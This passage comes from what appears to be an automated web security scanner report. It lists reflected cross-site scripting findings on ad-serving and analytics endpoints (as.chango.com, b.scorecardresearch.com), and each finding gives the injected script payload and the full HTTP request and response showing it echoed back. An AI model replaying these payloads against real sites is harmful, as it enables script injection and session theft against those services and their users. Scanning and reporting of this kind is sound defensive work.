User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "3ccbb74628e5162de88167a551c5399c17643cb5"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:23 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
1720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c98b84"><script>alert(1)</script>1a58b06938f&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0
...[SNIP]...

3.44. http://as.chango.com/links/adunit/1.31784959608e+12 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the sig request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 630a0"><script>alert(1)</script>8680e005f04 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442630a0"><script>alert(1)</script>8680e005f04 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "dbc757c09f1aecb558295edd424abd9166e1619e"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:25 GMT
Content-Length: 2283
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:25 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:25 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
e&da=10087&st=broad&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442630a0"><script>alert(1)</script>8680e005f04&cu=&dsi=None&clickURL=">
...[SNIP]...

3.45. http://as.chango.com/links/adunit/1.31784959608e+12 [st parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the st request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ecf75"><script>alert(1)</script>82dd5aa6d77 was submitted in the st parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broadecf75"><script>alert(1)</script>82dd5aa6d77&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "aebc4132b113c4b83f70defa48889b5467cd0eab"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:23 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroadecf75%22%3E%3Cscript%3Ealert%281%29%3C/script%3E82dd5aa6d77; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:23 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broadecf75"><script>alert(1)</script>82dd5aa6d77&bm=1.35767665494&wp=1.216667&kw=Malware+freeware&uf=4&kf=452172&atype=HISTORIC&test=0&adpos=0&bidder=bidder02-sj-west&ioi=13672&ts=1317849596069&sig=c485c0cefccda7a06afc37dd5dfc0442&cu=&dsi=None&click
...[SNIP]...

3.46. http://as.chango.com/links/adunit/1.31784959608e+12 [stid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the stid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12a6c"><script>alert(1)</script>c83276f8e05 was submitted in the stid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com12a6c"><script>alert(1)</script>c83276f8e05&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "5776f794450378623c9d462e194737a4808e726e"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:24 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com12a6c%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ec83276f8e05%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.286186.CHANGO/B5866234.9;sz=728x90;ord=1317850524373;click1=http://as.chango.com/links/click1317850524.38?acid=10699&adid=13711&agid=11720&stid=wattpad.com12a6c"><script>alert(1)</script>c83276f8e05&url=http://www.wattpad.com/stories/search/xss%20carbon&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=sa
...[SNIP]...

3.47. http://as.chango.com/links/adunit/1.31784959608e+12 [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4658b"><script>alert(1)</script>8afd7eebac2 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon4658b"><script>alert(1)</script>8afd7eebac2&wh=728&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "9dc6713bfb129ef207ed7f611acacc3c1fba28b9"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2283
Date: Wed, 05 Oct 2011 21:35:24 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:24 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:24 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
ANGO/B5866234.9;sz=728x90;ord=1317850524803;click1=http://as.chango.com/links/click1317850524.81?acid=10699&adid=13711&agid=11720&stid=wattpad.com&url=http://www.wattpad.com/stories/search/xss%20carbon4658b"><script>alert(1)</script>8afd7eebac2&dom=wattpad.com&ibs=None&mw=1.0&poo=o&kwid=5827781&eid=Rubicon&cid=10449&agid=11720&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35767665494&wp=1.216667&k
...[SNIP]...

3.48. http://as.chango.com/links/adunit/1.31784959608e+12 [wh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784959608e+12

Issue detail

The value of the wh request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f78f2"><script>alert(1)</script>a9e45e493c5 was submitted in the wh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784959608e+12?adid=13711&adpos=0&agid=11720&atype=HISTORIC&bidder=bidder02-sj-west&bm=1.35767665494&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYufpHt6aGepeA&eid=Rubicon&ht=90&ibs=None&kf=452172&kw=Malware+freeware&kwid=5827781&mw=1.0&poo=o&sid=c5e895a2-ef97-11e0-9e9f-00259035d82c&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849596069&uf=4&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories%2Fsearch%2Fxss%2520carbon&wh=728f78f2"><script>alert(1)</script>a9e45e493c5&wp=942D6ABAF8EA73E5&sig=c485c0cefccda7a06afc37dd5dfc0442 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-2.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; _i_ab=1; _t=b6ae888c-d95b-11e0-b096-0025900e0834; cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad

Response

HTTP/1.1 200 OK
Content-Length: 464
Server: Chango RTB Server
ETag: "b6b02b2ea821ec77770fcdfb020024fce5ed3dd7"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 05 Oct 2011 21:35:25 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e30505df43f84a6e5f1; Domain=chango.com; expires=Sat, 02 Oct 2021 21:35:25 GMT; Path=/
Set-Cookie: cc.i.10449=13711%7Cwattpad.com%7C5827781%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:35:25 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
</head>
<body style="width: 728f78f2"><script>alert(1)</script>a9e45e493c5px; height: 90px; margin: 0; padding: 0;">
...[SNIP]...

3.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 57262<script>alert(1)</script>69a836d822e was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=857262<script>alert(1)</script>69a836d822e&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:26 GMT
Date: Wed, 05 Oct 2011 20:41:26 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"857262<script>alert(1)</script>69a836d822e", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 2eb65<script>alert(1)</script>e135a45addd was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=2eb65<script>alert(1)</script>e135a45addd&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:38 GMT
Date: Wed, 05 Oct 2011 20:41:38 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
-){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"2eb65<script>alert(1)</script>e135a45addd", c15:"", c16:"", r:""});



3.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 9fa76<script>alert(1)</script>d9b292fdfe2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15=9fa76<script>alert(1)</script>d9b292fdfe2 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:40 GMT
Date: Wed, 05 Oct 2011 20:41:40 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
SCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"9fa76<script>alert(1)</script>d9b292fdfe2", c16:"", r:""});



3.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 8f927<script>alert(1)</script>18743ec238e was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=30056938f927<script>alert(1)</script>18743ec238e&c3=1&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Wed, 19 Oct 2011 20:41:29 GMT
Date: Wed, 05 Oct 2011 20:41:29 GMT
Content-Length: 1260
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"30056938f927<script>alert(1)</script>18743ec238e", c3:"1", c4:"http://www.thenextweb.com", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 5b3bf<script>alert(1)</script>03c12efd9cd was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=3005693&c3=15b3bf<script>alert(1)</script>03c12efd9cd&c4=http%3A%2F%2Fwww.thenextweb.com&c5=&c6=&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
